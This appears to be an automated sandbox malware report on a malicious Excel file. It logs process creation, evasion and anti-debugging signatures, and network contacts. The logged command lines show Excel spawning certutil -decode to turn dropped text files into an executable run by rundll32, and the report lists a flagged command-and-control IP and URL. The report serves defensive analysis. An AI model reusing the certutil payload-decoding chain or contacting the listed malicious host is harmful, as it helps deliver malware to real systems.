Hooking and other Techniques for Hiding and Protection:

Uses certutil -decode
Source: unknown Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: unknown Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\Public\94101.txt C:\Users\Public\94101.png2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\certutil.exe 'C:\Windows\System32\certutil.exe' -decodehex C:\Users\Public\94101.png2 C:\Users\Public\94101.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000007.00000002.255071756.0000000000900000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10001A64 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_10001A64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10001E5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_10001E5C
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page execute read | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 74.6.143.26 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 172.104.129.156 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 87.248.100.215 187 Jump to behavior

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10001C6B cpuid 6_2_10001C6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_1000168B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_1000168B

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
[Behavior Graph (rendered image) - ID: 342076, Sample: Presentation_812525.xlsb, Startdate: 20/01/2021, Architecture: WINDOWS, Score: 96. Process chain: EXCEL.EXE -> certutil.exe (x2, each spawning conhost.exe) and rundll32.exe -> rundll32.exe. Files dropped: C:\Users\user\...\~$Presentation_812525.xlsb (data), C:\Users\Public\94101.txt (ASCII), C:\Users\Public\94101.png2 (ASCII), C:\Users\Public\94101.png (PE32). Network: 192.168.2.1, 172.104.129.156:80 (LINODE-APLinodeLLCUS, United States), new-fp-shed.wg1.b.yahoo.com 87.248.100.215:443 (YAHOO-IRDGB, United Kingdom), 2 other IPs or domains. Signatures shown in graph: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); Uses certutil -decode; Document exploit detected (process start blacklist hit); Drops PE files to the user root directory; System process connects to network (likely due to code injection or exploit); 4 other signatures.]
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
74.6.143.26 | unknown | United States | 26101 | YAHOO-3US | false
172.104.129.156 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
87.248.100.215 | unknown | United Kingdom | 34010 | YAHOO-IRDGB | false

Private

IP
192.168.2.1

Contacted Domains

Name | IP | Active
new-fp-shed.wg1.b.yahoo.com | 87.248.100.215 | true
yahoo.com | 74.6.143.26 | true
www.yahoo.com | unknown | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://172.104.129.156/campo/o/o | true | 0% (Virustotal); Avira URL Cloud: safe | unknown